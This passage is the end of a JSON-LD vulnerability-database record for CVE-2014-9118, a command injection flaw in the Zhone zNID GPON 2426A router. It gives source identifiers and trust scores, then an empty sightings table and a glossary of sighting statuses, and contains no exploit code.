"id": "CVE-2014-9118"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201510-721"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Zhone zNID GPON 2426A Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008410"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201510-721"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.